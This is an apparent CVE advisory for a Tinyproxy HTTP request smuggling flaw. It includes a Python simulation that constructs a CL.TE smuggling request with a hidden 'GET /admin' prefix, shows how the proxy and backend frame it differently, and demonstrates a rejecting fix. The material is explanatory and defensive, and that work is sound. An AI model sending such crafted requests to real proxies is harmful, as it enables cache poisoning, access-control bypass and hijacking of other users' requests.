CVE-2026-54387
Status: Received - Intake
Tinyproxy HTTP Request Smuggling Vulnerability

Publication date: 2026-06-17

Last updated on: 2026-06-17

Assigner: VulnCheck

Description
Tinyproxy through 1.11.3, fixed in commit ff45d3b, fails to reconcile conflicting Content-Length and Transfer-Encoding: chunked headers, forwarding both verbatim to the backend while using Content-Length to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.
Meta Information
Published: 2026-06-17
Last Modified: 2026-06-17
Generated: 2026-06-18
AI Q&A: 2026-06-18
EPSS Evaluated: N/A
Affected Vendors & Products (1 associated CPE)
Vendor      Product     Version / Range
tinyproxy   tinyproxy   1.11.3 (the description covers all versions through 1.11.3; the CPE lists only the last affected release)
CWE
CWE-444 (Inconsistent Interpretation of HTTP Requests, "HTTP Request/Response Smuggling"): The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.
Executive Summary

This vulnerability exists in Tinyproxy versions up to 1.11.3. Tinyproxy does not reconcile a request that carries both Content-Length and Transfer-Encoding: chunked: it forwards both headers unchanged to the backend server but uses Content-Length to decide how many bytes of the request body to read. RFC 9112 (section 6.3) says the opposite: when both are present, Transfer-Encoding takes precedence, and an intermediary must either reject the message or remove Content-Length before forwarding it. A backend that follows the RFC therefore stops reading the body at the chunked terminator, while the proxy has already forwarded every byte covered by Content-Length. The bytes left over at the backend are parsed as the start of the next request on that connection, so the proxy and backend hold different views of where one request ends and the next begins (the CL.TE pattern of request smuggling).

As a result, a remote attacker who can send a single crafted request through the proxy can inject an arbitrary HTTP request, or the prefix of one, into the backend connection. Because the leftover bytes attach to whatever request the proxy forwards next, the injected request can run with another client's request appended to it. This can lead to cache poisoning, bypassing access controls enforced at the proxy, and hijacking of other users' requests.
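The desynchronization described in the Description and the Executive Summary, as an added example that is not Tinyproxy's code and does not reproduce the fix in commit ff45d3b: a small Python model that frames the same byte stream twice, once with the Content-Length-first rule the advisory attributes to Tinyproxy and once with the Transfer-Encoding-first rule of RFC 9112, then applies a reconciled policy that refuses to forward a message carrying both headers. The host example.test, the paths /admin and /search, the assumption that the proxy writes consecutive client requests to one backend connection, and the choice to reject (rather than strip Content-Length and honour chunked, which the RFC also allows) are all assumptions of the example, and the traffic is constructed inline.

```python
"""Added example (not Tinyproxy source): model the CL.TE desync between a
proxy that frames bodies by Content-Length and an RFC 9112 backend that
gives Transfer-Encoding precedence, and show a reconciliation that closes
it. Hosts, paths and the reject-on-conflict choice are assumptions."""


def split_head(stream):
    """Return (head, rest) split at the first CRLFCRLF; head excludes it."""
    i = stream.find(b"\r\n\r\n")
    if i < 0:
        raise ValueError("incomplete head")
    return stream[:i], stream[i + 4:]


def parse_head(head):
    """Return (request_line, {lower-cased name: [values]}); repeats are kept."""
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def read_chunked(body):
    """Consume a chunked body with no trailers; return (decoded, remainder)."""
    pos, out = 0, b""
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("incomplete chunk-size line")
        size = int(body[pos:eol].split(b";")[0].decode("ascii"), 16)
        pos = eol + 2
        if size == 0:  # last-chunk, then the empty trailer section's CRLF
            if body[pos:pos + 2] != b"\r\n":
                raise ValueError("missing terminating CRLF")
            return out, body[pos + 2:]
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def frame_requests(stream, policy):
    """Cut `stream` into messages; policy(headers) returns "cl", "te" or "none".
    Each message is (request_line, headers, raw bytes consumed for it)."""
    msgs = []
    while stream:
        head, rest = split_head(stream)
        request_line, headers = parse_head(head)
        mode = policy(headers)
        if mode == "te":
            _, remainder = read_chunked(rest)
        elif mode == "cl":
            n = int(headers[b"content-length"][0])
            if len(rest) < n:
                raise ValueError("incomplete body")
            remainder = rest[n:]
        else:
            remainder = rest
        msgs.append((request_line, headers, stream[:len(stream) - len(remainder)]))
        stream = remainder
    return msgs


def vulnerable_proxy(headers):
    """Framing as the advisory describes it: Content-Length wins when both are present."""
    if b"content-length" in headers:
        return "cl"
    return "te" if b"transfer-encoding" in headers else "none"


def rfc_backend(headers):
    """RFC 9112 section 6.3: Transfer-Encoding overrides Content-Length."""
    if b"transfer-encoding" in headers:
        return "te"
    return "cl" if b"content-length" in headers else "none"


def hardened_proxy(headers):
    """Reconciled framing (an assumed fix, not commit ff45d3b): a message carrying both
    headers is rejected instead of forwarded; stripping Content-Length and honouring
    chunked would also satisfy the RFC, but rejecting never forwards an ambiguous message."""
    if b"transfer-encoding" in headers and b"content-length" in headers:
        raise ValueError("400 Bad Request: Content-Length conflicts with Transfer-Encoding")
    return rfc_backend(headers)


# Constructed traffic. The attacker's Content-Length covers the empty chunked body
# AND the smuggled prefix, so a CL-framed proxy forwards all of it as one request.
SMUGGLED_PREFIX = b"GET /admin HTTP/1.1\r\nHost: example.test\r\nX-Ignore: "
_ATTACK_BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
ATTACKER = (
    b"POST / HTTP/1.1\r\nHost: example.test\r\n"
    + b"Content-Length: " + str(len(_ATTACK_BODY)).encode() + b"\r\n"
    + b"Transfer-Encoding: chunked\r\n\r\n"
    + _ATTACK_BODY
)
# The next request the proxy writes to the same backend connection (from any client).
VICTIM = b"GET /search?q=x HTTP/1.1\r\nHost: example.test\r\n\r\n"


def run(proxy_policy):
    """Frame at the proxy, forward the framed bytes verbatim, re-frame at the backend.
    Returns (request lines the proxy saw, request lines the backend saw, backend headers)."""
    proxy_msgs = frame_requests(ATTACKER + VICTIM, proxy_policy)
    forwarded = b"".join(raw for _, _, raw in proxy_msgs)  # both headers pass through
    backend_msgs = frame_requests(forwarded, rfc_backend)
    return ([m[0] for m in proxy_msgs],
            [m[0] for m in backend_msgs],
            [m[1] for m in backend_msgs])


def proxy_rejects(proxy_policy, stream=ATTACKER):
    """True if the proxy refuses to frame `stream` at all."""
    try:
        frame_requests(stream, proxy_policy)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    proxy_seen, backend_seen, backend_hdrs = run(vulnerable_proxy)
    print("proxy framed:  ", proxy_seen)
    print("backend framed:", backend_seen)
    print("victim request line absorbed into X-Ignore:", backend_hdrs[1][b"x-ignore"])
    print("hardened proxy rejects the attacker request:", proxy_rejects(hardened_proxy))
```

Running it shows the two views diverging: the proxy frames POST / followed by GET /search, while the backend frames POST / followed by GET /admin, with the victim's request line swallowed into the smuggled X-Ignore header. The smuggled prefix deliberately omits its terminating blank line so that whatever the proxy forwards next completes it, which is the mechanism behind the request hijacking and access control bypass the advisory lists. Swapping in hardened_proxy makes the attacker's message fail framing before anything is forwarded.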

Impact Analysis

The vulnerability can have serious security impacts including:

  • Cache poisoning - attackers can manipulate cached content served by the backend.
  • Access control bypass - unauthorized users may gain access to restricted resources.
  • Request hijacking - attackers can inject and control HTTP requests sent to the backend.